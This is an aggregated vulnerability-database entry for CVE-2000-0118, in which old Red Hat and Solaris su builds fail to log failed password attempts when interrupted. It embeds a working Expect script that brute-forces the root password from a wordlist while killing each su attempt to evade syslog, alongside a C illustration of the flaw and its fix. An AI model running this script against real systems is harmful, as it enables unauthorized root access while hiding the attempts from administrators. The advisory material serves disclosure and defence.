CVE-2000-0118
CVSS7.2
Published: 1999-06-09 00:00:00
Last modified: 2016-10-17 22:06:30

[Original] The Red Hat Linux su program does not log failed password guesses if the su process is killed before it times out, which allows local attackers to conduct brute force password guessing.


[CNNVD] RedHat su No Logging Vulnerability (CNNVD-199906-015)

        The Red Hat Linux su program has a vulnerability. If the su process is terminated before it times out, the program does not log the failed password guess, which a local attacker can exploit to brute-force passwords.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can take the system down entirely]
Access complexity: LOW [no special access conditions required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:redhat:linux:4.2  Red Hat Linux 4.2
cpe:/o:redhat:linux:5.1  Red Hat Linux 5.1
cpe:/o:redhat:linux:2.0  Red Hat Linux 2.0
cpe:/o:redhat:linux:2.1  Red Hat Linux 2.1
cpe:/o:sun:solaris:2.4::x86
cpe:/o:redhat:linux:4.0  Red Hat Linux 4.0
cpe:/o:sun:solaris:::x86
cpe:/o:redhat:linux:4.1  Red Hat Linux 4.1
cpe:/o:redhat:linux:5.0  Red Hat Linux 5.0
cpe:/o:redhat:linux:6.0::i386
cpe:/o:sun:solaris:2.5
cpe:/o:redhat:linux:5.2::i386
cpe:/o:redhat:linux:6.1::i386
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.1
cpe:/o:sun:solaris:1.2
cpe:/o:sun:solaris:1.1
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:2.0
cpe:/o:sun:solaris:1.1.1a
cpe:/o:sun:solaris:1.1.3
cpe:/o:sun:solaris:2.2
cpe:/o:sun:solaris:1.1.2
cpe:/o:sun:solaris:1.1.4
cpe:/o:redhat:linux:3.0.3  Red Hat Linux 3.0.3
cpe:/o:sun:solaris:1.1.3:u1
cpe:/o:sun:solaris:1.1.4::jl
cpe:/o:redhat:linux:6.0::alpha
cpe:/o:redhat:linux:5.2::alpha
cpe:/o:redhat:linux:6.1::alpha
cpe:/o:redhat:linux:6.0::sparc
cpe:/o:redhat:linux:5.2::sparc
cpe:/o:redhat:linux:6.1::sparc

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0118
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0118
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199906-015
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=94935300520617&w=2
(UNKNOWN)  BUGTRAQ  20000130 RedHat 6.1 /and others/ PAM

- Vulnerability information

RedHat su No Logging Vulnerability
High risk  Unknown
1999-06-09 00:00:00 2007-05-22 00:00:00
Local
        The Red Hat Linux su program has a vulnerability. If the su process is terminated before it times out, the program does not log the failed password guess, which a local attacker can exploit to brute-force passwords.

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (19255)

RedHat Linux 5.2 i386/6.0 No Logging Vulnerability (EDBID:19255)
linux local
1999-06-09 Verified
0 Tani Hosokawa
N/A
source: http://www.securityfocus.com/bid/320/info

A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity.

su is a command that allows users to change identities by supplying a password. If the password is correct, su immediately executes a new shell with the identity of the new user; otherwise it sleeps for a second and then logs an authentication failure to syslog.

Since su sleeps before logging the failure and does not trap SIGINT, a user can try a password and, if su does not immediately give him a new shell, hit control-c within that one second; his attempt will then not be logged. He can automate the process to brute force passwords.

It has been tested using sh-utils-1.16-14 and pam-0.64-3.

#!/usr/local/bin/expect --

# A quick little sploit for a quick round of beers :) mudge@L0pht.com

#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember. 
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#    attempt to SU
#          |
#     successful
#    /          \
#   Y            N
#   |            |
# exec cmd     sleep
#                |
#             syslog 
#                |
#              exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occurred.
#       
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
#     .mudge


if { ($argc < 1) || ($argc > 1) } {
  puts "correct usage is : $argv0 pwfile"
  exit
}

set pwfile [open $argv "r"]

log_user 0
foreach line [split [read $pwfile] "\n"] {
  spawn su root
  expect "Password:"
  send "$line\n"
  # you might need to tweak this but it should be ok
  set timeout 2
  expect {
    "#" { puts "root password is $line\n" ; exit }
  }
  set id [ exp_pid ]
  exec kill -INT $id
}


- Vulnerability information

13635
Red Hat Linux su Failed Password Logging Weakness
Local Access Required Other
Loss of Confidentiality Upgrade
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-01-30 Unknown
Unknown Unknown

- Solution

Upgrade to version 6.1 i386 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

RedHat su No Logging Vulnerability
Unknown 320
No Yes
1999-06-09 12:00:00 2009-07-11 12:16:00
This vulnerability was reported to the BUGTRAQ mailing list by Tani Hosokawa <unknown@riverstyx.net>.

- Affected versions

RedHat Linux 6.0
RedHat Linux 5.2 i386
RedHat Linux 6.1 i386

- Unaffected versions

RedHat Linux 6.1 i386

- Discussion

A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity.

su is a command that allows users to change identities by supplying a password. If the password is correct, su immediately executes a new shell with the identity of the new user; otherwise it sleeps for a second and then logs an authentication failure to syslog.

Since su sleeps before logging the failure and does not trap SIGINT, a user can try a password and, if su does not immediately give him a new shell, hit control-c within that one second; his attempt will then not be logged. He can automate the process to brute force passwords.

It has been tested using sh-utils-1.16-14 and pam-0.64-3.
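The ordering flaw described above (delay first, syslog second, no signal handling) is easy to reproduce and to fix in a few lines. The following is an added illustration, not su's or PAM's code: the "audit log" is a byte on a pipe so a parent process can observe whether the failure record was ever written, the password check is a constructed toy, and the harness delivers the same SIGINT the description talks about while the child is inside its delay.

```c
#define _DEFAULT_SOURCE
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed stand-ins (not su's code): the "syslog" is one byte on a pipe so
 * a parent process can observe whether the failure record was ever written. */
static int audit_fd = -1;
static void audit_failure(void) { if (audit_fd >= 0) (void)write(audit_fd, "F", 1); }
static int password_ok(const char *p) { return strcmp(p, "hunter2") == 0; } /* toy check */

/* Vulnerable ordering (what the advisory describes): delay first, log second,
 * with default signal dispositions, so SIGINT during the delay kills the
 * process before anything is logged. */
int auth_vulnerable(const char *given) {
    if (password_ok(given)) return 1;
    sleep(1);
    audit_failure();
    return 0;
}

/* Hardened ordering: write the audit record before any delay, and ignore the
 * interactive signals while delaying so the pause cannot be cut short either. */
int auth_hardened(const char *given) {
    struct sigaction ign, old_int, old_quit;
    if (password_ok(given)) return 1;
    audit_failure();
    memset(&ign, 0, sizeof ign); ign.sa_handler = SIG_IGN;
    sigaction(SIGINT, &ign, &old_int);
    sigaction(SIGQUIT, &ign, &old_quit);
    sleep(1);
    sigaction(SIGINT, &old_int, NULL);
    sigaction(SIGQUIT, &old_quit, NULL);
    return 0;
}

/* Harness: run fn with a wrong password in a child, send SIGINT mid-delay (the
 * ctrl-c from the advisory), and return 1 if a failure record arrived, else 0. */
int failure_was_logged(int (*fn)(const char *)) {
    int fds[2]; char c; pid_t pid;
    if (pipe(fds) != 0) return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) { close(fds[0]); audit_fd = fds[1]; _exit(fn("wrong")); }
    close(fds[1]);
    usleep(300000);                 /* child is now inside its sleep(1) */
    kill(pid, SIGINT);
    waitpid(pid, NULL, 0);
    int logged = read(fds[0], &c, 1) == 1;
    close(fds[0]); return logged;
}
```

Running `failure_was_logged` on each variant shows the vulnerable ordering loses the record while the hardened one keeps it; the same log-before-delay rule applies to any authenticator that rate-limits by sleeping.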

- Exploit

x

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
